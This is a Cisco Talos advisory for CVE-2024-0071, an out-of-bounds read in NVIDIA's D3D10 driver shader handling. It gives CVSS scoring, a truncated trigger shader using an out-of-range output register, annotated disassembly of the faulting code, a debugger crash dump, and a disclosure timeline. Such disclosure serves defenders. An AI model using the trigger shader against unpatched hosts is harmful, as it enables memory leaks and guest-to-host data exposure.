Lucene search

K
talosTalos IntelligenceTALOS-2023-1849
HistoryFeb 29, 2024 - 12:00 a.m.

NVIDIA D3D10 Driver Shader Functionality out-of-bounds read vulnerability

2024-02-2900:00:00
Talos Intelligence
www.talosintelligence.com
8
nvidia d3d10 driver
shader functionality
out-of-bounds read
vulnerability
talos
cve-2024-0071
graphics drivers
virtualization
hyper-v
remotefx
vulnerable code
memory read problem
cwe-125

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score

7

Confidence

High

EPSS

0

Percentile

9.0%

Talos Vulnerability Report

TALOS-2023-1849

NVIDIA D3D10 Driver Shader Functionality out-of-bounds read vulnerability

February 29, 2024
CVE Number

CVE-2024-0071

SUMMARY

An out-of-bounds read vulnerability exists in the Shader functionality of NVIDIA D3D10 Driver, Version 546.01, 31.0.15.4601. A specially crafted executable/shader file can lead to an out-of-bounds read. An attacker can provide a specially crafted shader file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

NVIDIA D3D10 Driver NVIDIA D3D10 Driver, Version 546.01, 31.0.15.4601

PRODUCT URLS

D3D10 Driver - <https://nvidia.com>

CVSSv3 SCORE

7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-125 - Out-of-bounds Read

DETAILS

NVIDIA Graphics drivers are software for NVIDIA Graphics GPU installed on the PC, used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.

This vulnerability potentially could be triggered from guest machines running virtualization environments (ie. VMware, qemu, VirtualBox, etc.) in order to perform guest-to-host escape (demonstrated before in TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically this vulnerability could be also triggered from a web browser (using webGL and webassembly). We were able to trigger this vulnerability from HYPER-V guest using a RemoteFX feature, leading to executing the vulnerable code on the HYPER-V host (inside of the rdvgm.exe process). While the RemoteFX was recently deprecated by Microsoft, some older machines may still use this software.

This vulnerability can be triggered by supplying a malformed shader. This leads to out-of-bounds memory read problem in NVIDIA driver.

Example of shader triggering the bug: … dcl_output o0.xyzw dcl_temps 1 div r0.xy, v0.xyxx, cb0[0].xyxx sample r0.xyz, r0.xyxx, resource[0].xyzw, sampler[0] mov o0.xyz, r0.xyzx mov o16171776.w, l(1) ret

By specifying the output register number, which exceeds the declared range, it is possible to force the NVIDIA driver to read arbitrary memory data:

Vulnerable code is presented below:

	00007FFE600A7B61 | 44:8B1B                  | mov r11d,dword ptr ds:[rbx]                              |
	00007FFE600A7B64 | B8 02000012              | mov eax,12000002                                         |
	00007FFE600A7B69 | 45:8B4D 28               | mov r9d,dword ptr ds:[r13+28]                            | * 
	00007FFE600A7B6D | 41:BC 34110000           | mov r12d,1134                                            |
	00007FFE600A7B73 | 4C:8B56 20               | mov r10,qword ptr ds:[rsi+20]                            |
	00007FFE600A7B77 | 41:83FB 1C               | cmp r11d,1C                                              |
	00007FFE600A7B7B | 77 09                    | ja nvwgf2umx.7FFE600A7B86                                |
	00007FFE600A7B7D | 44:0FA3D8                | bt eax,r11d                                              |
	00007FFE600A7B81 | 41:8BFC                  | mov edi,r12d                                             |
	00007FFE600A7B84 | 72 05                    | jb nvwgf2umx.7FFE600A7B8B                                |
	00007FFE600A7B86 | BF C8110000              | mov edi,11C8                                             |
	00007FFE600A7B8B | 41:B8 34000000           | mov r8d,34                                               |
	00007FFE600A7B91 | 41:8BD7                  | mov edx,r15d                                             |
	00007FFE600A7B94 | 41:0FA3D6                | bt r14d,edx                                              |
	00007FFE600A7B98 | 73 26                    | jae nvwgf2umx.7FFE600A7BC0                               |
	00007FFE600A7B9A | 46:8D3C8D 00000000       | lea r15d,qword ptr ds:[r9*4]                             | *
	00007FFE600A7BA2 | 41:8D0C17                | lea ecx,qword ptr ds:[r15+rdx]                           | * 
	00007FFE600A7BA6 | 49:03CA                  | add rcx,r10                                              | 
	00007FFE600A7BA9 | 0FB60439                 | movzx eax,byte ptr ds:[rcx+rdi]                          | * out-of-bounds read

The RCX register value (operand for memory read operation) is computed by multiplying the value provided by the attacker in the bytecode. Therefore, the attacker can control the address of the read operation. This leads to out-of-bounds read and potential memory leak (especially if the guest runs in a virtualized environment, allowing the attacker to use this attack to leak host data to the guest).

Crash Information

	0:017&gt; !analyze -v
	*******************************************************************************
	*                                                                             *
	*                        Exception Analysis                                   *
	*                                                                             *
	*******************************************************************************


	KEY_VALUES_STRING: 1

		Key  : AV.Fault
		Value: Read

		Key  : Analysis.CPU.mSec
		Value: 1312

		Key  : Analysis.Elapsed.mSec
		Value: 9602

		Key  : Analysis.IO.Other.Mb
		Value: 18

		Key  : Analysis.IO.Read.Mb
		Value: 0

		Key  : Analysis.IO.Write.Mb
		Value: 30

		Key  : Analysis.Init.CPU.mSec
		Value: 624

		Key  : Analysis.Init.Elapsed.mSec
		Value: 16333

		Key  : Analysis.Memory.CommitPeak.Mb
		Value: 86

		Key  : Failure.Bucket
		Value: INVALID_POINTER_READ_c0000005_nvwgf2umx.dll!Unknown

		Key  : Failure.Hash
		Value: {7b367f86-064a-2e05-5dc0-760739d560ad}

		Key  : Timeline.OS.Boot.DeltaSec
		Value: 591430

		Key  : Timeline.Process.Start.DeltaSec
		Value: 16

		Key  : WER.OS.Branch
		Value: vb_release

		Key  : WER.OS.Version
		Value: 10.0.19041.1


	NTGLOBALFLAG:  70

	APPLICATION_VERIFIER_FLAGS:  0

	EXCEPTION_RECORD:  (.exr -1)
	ExceptionAddress: 00007ffe600a7ba9 (nvwgf2umx!NVENCODEAPI_Thunk+0x0000000000112949)
	   ExceptionCode: c0000005 (Access violation)
	  ExceptionFlags: 00000000
	NumberParameters: 2
	   Parameter[0]: 0000000000000000
	   Parameter[1]: 00000297e058190b
	Attempt to read from address 00000297e058190b

	FAULTING_THREAD:  000018ec

	PROCESS_NAME:  POC_EXEC11.exe

	READ_ADDRESS:  00000297e058190b 

	ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si  do pami ci pod adresem 0x%p. Pami   nie mo e by  %s.

	EXCEPTION_CODE_STR:  c0000005

	EXCEPTION_PARAMETER1:  0000000000000000

	EXCEPTION_PARAMETER2:  00000297e058190b

	STACK_TEXT:  
	000000d8`efb8e810 00007ffe`600ac664     : 000000d8`efb8ec80 00000002`00010000 00000297`dc7cb8e0 00000000`00000000 : nvwgf2umx!NVENCODEAPI_Thunk+0x112949
	000000d8`efb8eaa0 00007ffe`6008f2e1     : 00000297`dc7cfb40 000000d8`efb8ef48 000000d8`efb8ef48 000000d8`efb8ec80 : nvwgf2umx!NVENCODEAPI_Thunk+0x117404
	000000d8`efb8eb50 00007ffe`60242ae5     : 00007ffe`5fe00000 00006492`3dd45a97 00000297`dc7cfb40 00000000`00000001 : nvwgf2umx!NVENCODEAPI_Thunk+0xfa081
	000000d8`efb8ee70 00007ffe`6007cfbd     : 00007ffe`600c08b4 000000d8`efb8eee0 00000297`dc7cb8e0 00000000`00000001 : nvwgf2umx!NVAPI_Thunk+0x166e55
	000000d8`efb8eea0 00007ffe`6007bf20     : 00000000`fffff865 000000d8`efb8f3d0 00000000`fffff80e 00000000`ffffffff : nvwgf2umx!NVENCODEAPI_Thunk+0xe7d5d
	000000d8`efb8f350 00007ffe`5fecbe1f     : 00000000`00000000 00000000`00000000 00000297`00000005 000000d8`efb8f7f0 : nvwgf2umx!NVENCODEAPI_Thunk+0xe6cc0
	000000d8`efb8f400 00007ffe`5fecd40b     : 00000297`d86e5280 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_DirectMethods+0x3ce0f
	000000d8`efb8f4e0 00007ffe`616637fa     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_DirectMethods+0x3e3fb
	000000d8`efb8f7c0 00007ffe`616634f8     : 00000000`00000000 00000297`d65f2700 00000000`00000000 00000297`dc80c760 : nvwgf2umx!NVDEV_Thunk+0x380ca
	000000d8`efb8f8e0 00007ffe`61692fa3     : 00000000`00000000 00000000`00000000 00000297`d86d67c0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x37dc8
	000000d8`efb8f990 00007ffe`61692e9f     : 00000000`00000000 00000297`dc91f5e0 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x67873
	000000d8`efb8f9e0 00007ffe`61c418ee     : 00000297`dc91f5e0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x6776f
	000000d8`efb8fa10 00007fff`24307344     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x6161be
	000000d8`efb8fa40 00007fff`25e826b1     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
	000000d8`efb8fa70 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


	SYMBOL_NAME:  nvwgf2umx+112949

	MODULE_NAME: nvwgf2umx

	IMAGE_NAME:  nvwgf2umx.dll

	STACK_COMMAND:  ~17s ; .cxr ; kb

	FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_nvwgf2umx.dll!Unknown

	BUCKET_ID_MODPRIVATE: 1

	OS_VERSION:  10.0.19041.1

	BUILDLAB_STR:  vb_release

	OSPLATFORM_TYPE:  x64

	OSNAME:  Windows 10

	IMAGE_VERSION:  31.0.15.4601

	FAILURE_ID_HASH:  {7b367f86-064a-2e05-5dc0-760739d560ad}

	Followup:     MachineOwner
	---------
TIMELINE

2023-11-15 - Vendor Disclosure
2024-02-28 - Vendor Patch Release
2024-02-29 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.


Vulnerability Reports Next Report

TALOS-2023-1887

Previous Report

TALOS-2023-1843

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score

7

Confidence

High

EPSS

0

Percentile

9.0%